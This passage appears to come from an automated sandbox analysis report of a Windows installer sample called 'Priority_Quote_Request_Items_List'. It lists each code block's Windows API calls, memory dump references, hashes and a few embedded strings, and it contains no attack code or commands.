                                                      • SetBkMode.GDI32(?,?), ref: 00404196
                                                      • GetSysColor.USER32(?), ref: 004041A9
                                                      • SetBkColor.GDI32(?,?), ref: 004041B9
                                                      • DeleteObject.GDI32(?), ref: 004041D3
                                                      • CreateBrushIndirect.GDI32(?), ref: 004041DD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                      • String ID:
                                                      • API String ID: 2320649405-0
                                                      • Opcode ID: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
                                                      • Instruction ID: 030d9aaba4ad3e93a8394b0be899aa32a9dffcfc2c3f2c4c75d4aa3950b62208
                                                      • Opcode Fuzzy Hash: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
                                                      • Instruction Fuzzy Hash: CE21A4B5804704ABC7209F68DD48B4B7BF8AF41710F048A29F995E62E0C734E944CB55
                                                      APIs
                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                        • Part of subcall function 00405CD0: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405CE6
                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                      • String ID: 9
                                                      • API String ID: 163830602-2366072709
                                                      • Opcode ID: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
                                                      • Instruction ID: af7b16596185cfa7f969e470bfe402a155c7c568a05af23699f2fbc440ccd5d4
                                                      • Opcode Fuzzy Hash: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
                                                      • Instruction Fuzzy Hash: DF514A74D00219AADF209F94C988AAEB779FF04304F50447BE501F72D0D7B89D42DB69
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A5E
                                                      • GetMessagePos.USER32 ref: 00404A66
                                                      • ScreenToClient.USER32(?,?), ref: 00404A80
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A92
                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AB8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: Message$Send$ClientScreen
                                                      • String ID: f
                                                      • API String ID: 41195575-1993550816
                                                      • Opcode ID: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
                                                      • Instruction ID: 24e0014d109499f5a76e1caf6b4fbcffaf68b7ceae62979d4c0808fe7bebc9aa
                                                      • Opcode Fuzzy Hash: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
                                                      • Instruction Fuzzy Hash: A1015271E40219BADB00DB94DD45FFEBBBCAB54711F10012BBB11F62C0D7B4A9018B95
                                                      APIs
                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                      • MulDiv.KERNEL32(0012FC3B,00000064,0012FC3F), ref: 00402D4D
                                                      • wsprintfW.USER32 ref: 00402D5D
                                                      • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                      Strings
                                                      • verifying installer: %d%%, xrefs: 00402D57
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                      • String ID: verifying installer: %d%%
                                                      • API String ID: 1451636040-82062127
                                                      • Opcode ID: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
                                                      • Instruction ID: 3cda0e2316cf55cb202c1321fdb8a93457d01500b45ed37e1556afe5f89d55e5
                                                      • Opcode Fuzzy Hash: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
                                                      • Instruction Fuzzy Hash: 1D014470500209ABEF249F61DD49FEA3B69EB04344F008035FA05A92D0DBB999548B59
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                      • GlobalFree.KERNEL32(?), ref: 004028E9
                                                      • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                      • CloseHandle.KERNEL32(?), ref: 00402914
                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                      • String ID:
                                                      • API String ID: 2667972263-0
                                                      • Opcode ID: 717dcf576c097408dac1e53f9241d150a48d45124f8545d76f83d87da111a921
                                                      • Instruction ID: c1a5639659a60ac5c9bd0712390274ed5d57598099091cca2b2fb0d84b3ff26b
                                                      • Opcode Fuzzy Hash: 717dcf576c097408dac1e53f9241d150a48d45124f8545d76f83d87da111a921
                                                      • Instruction Fuzzy Hash: 1621AC72C04128BBCF216FA5CD49D9E7E79EF09324F24023AF520762E1C7795D418BA9
                                                      APIs
                                                      • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                                      • wsprintfW.USER32 ref: 004049DF
                                                      • SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: ItemTextlstrlenwsprintf
                                                      • String ID: %u.%u%s%s$&B
                                                      • API String ID: 3540041739-2907463167
                                                      • Opcode ID: 0ddaf8743021833403b6e28cda1e3337aa5d1e434209783b13d21619e8b34570
                                                      • Instruction ID: 7355c158aba8d6b586dda53eb311f6ba2c540b654501303b209b4c25e60a8b93
                                                      • Opcode Fuzzy Hash: 0ddaf8743021833403b6e28cda1e3337aa5d1e434209783b13d21619e8b34570
                                                      • Instruction Fuzzy Hash: 4711D8736041387BEB10A57D9C41E9F368C9B85374F250237FA26F61D2DA79C81282E8
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: Close$DeleteEnumOpen
                                                      • String ID:
                                                      • API String ID: 1912718029-0
                                                      • Opcode ID: b3c3789dbf1e9407cfaa69bc32a43c717e622f94ad988b79edf66977fe5f390d
                                                      • Instruction ID: 13aa261ecf2a86817b53105e55b29f339a5543dfd3ea7b5a0579e289bf8829aa
                                                      • Opcode Fuzzy Hash: b3c3789dbf1e9407cfaa69bc32a43c717e622f94ad988b79edf66977fe5f390d
                                                      • Instruction Fuzzy Hash: 04116A71908118FFEF119F90DE8CEAE3B79FB14384F100476FA05A11A0D3B49E52AA69
                                                      APIs
                                                      • GetDlgItem.USER32(?,?), ref: 00401D00
                                                      • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                      • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                      • String ID:
                                                      • API String ID: 1849352358-0
                                                      • Opcode ID: 658c1924fa8f238d90a05b66423510a0a4ae35360fa9b687f360e54937d3183e
                                                      • Instruction ID: e9fcbf52d61700e0958b70f2e427462db2dea441f2720d4c42107852d76fa8f5
                                                      • Opcode Fuzzy Hash: 658c1924fa8f238d90a05b66423510a0a4ae35360fa9b687f360e54937d3183e
                                                      • Instruction Fuzzy Hash: F1F0E172A04104AFD701DBE4DE88CEEBBBDEB48311B104466F601F51A1C674ED418B39
                                                      APIs
                                                      • GetDC.USER32(?), ref: 00401D59
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                      • CreateFontIndirectW.GDI32(0040BDB0), ref: 00401DD1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                      • String ID:
                                                      • API String ID: 3808545654-0
                                                      • Opcode ID: 06fadfaa6bdd1743c224a57f1fa3d051dabd33ef56df0071652300793eec0471
                                                      • Instruction ID: fb6460544efe8fce5462e25cc9af4f7d3d1b7b368dfcdde6bb1bed5e2218b2c2
                                                      • Opcode Fuzzy Hash: 06fadfaa6bdd1743c224a57f1fa3d051dabd33ef56df0071652300793eec0471
                                                      • Instruction Fuzzy Hash: BC01A231958281AFE7026BB0AE0AB9A7F74FF25301F004479F501B62E2C77810048B6E
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Timeout
                                                      • String ID: !
                                                      • API String ID: 1777923405-2657877971
                                                      • Opcode ID: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                                      • Instruction ID: a86adb03786c756a90e8c754dee758adf3648459c58847ecf436330ca9d5af9c
                                                      • Opcode Fuzzy Hash: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                                      • Instruction Fuzzy Hash: B121B071944209BEEF01AFB0CE4AABE7B75EB40304F10403EF601B61D1D6B89A40DB69
                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(?,?,0040A5A8,000000FF,modarbejdelsen\kipchak,00000400,?,?,00000021), ref: 00402583
                                                      • lstrlenA.KERNEL32(modarbejdelsen\kipchak,?,?,0040A5A8,000000FF,modarbejdelsen\kipchak,00000400,?,?,00000021), ref: 0040258E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWidelstrlen
                                                      • String ID: modarbejdelsen\kipchak
                                                      • API String ID: 3109718747-476049131
                                                      • Opcode ID: 5bc57b7d2ddd0c7810b60d4f44f8479986bce4c56d5cf31a7dccef1616d0a1b7
                                                      • Instruction ID: 2aea9811a9a124710f812c99978ab25d5578c47fcc6e4ef6251516289d3ba225
                                                      • Opcode Fuzzy Hash: 5bc57b7d2ddd0c7810b60d4f44f8479986bce4c56d5cf31a7dccef1616d0a1b7
                                                      • Instruction Fuzzy Hash: 73113A32A41214BEDB10AFB18F4AE9E3264AF94385F20403BF402F61C2D6FC8E41562E
                                                      APIs
                                                        • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                        • Part of subcall function 00405A79: CharNextW.USER32(?,?,00424EF0,?,00405AED,00424EF0,00424EF0, 4Wu,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405A8C
                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405AA4
                                                      • lstrlenW.KERNEL32(00424EF0,00000000,00424EF0,00424EF0, 4Wu,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B2F
                                                      • GetFileAttributesW.KERNEL32(00424EF0,00424EF0,00424EF0,00424EF0,00424EF0,00424EF0,00000000,00424EF0,00424EF0, 4Wu,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 00405B3F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                      • String ID: 4Wu$C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 3248276644-3057243036
                                                      • Opcode ID: a98bc8d6da3f7a1147296ea9518b403604e3dfaf614f974499b81bc4e28990f4
                                                      • Instruction ID: ed71898f9691fad2d221d0acf12a8c788c2999d668287f0dc65a00c2ad5638d3
                                                      • Opcode Fuzzy Hash: a98bc8d6da3f7a1147296ea9518b403604e3dfaf614f974499b81bc4e28990f4
                                                      • Instruction Fuzzy Hash: 4CF04425301E5115CA22367A2C44AAF2414DFC236474A073BF842B22D1CA3CA943DDBE
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,: Completed,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F11
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F32
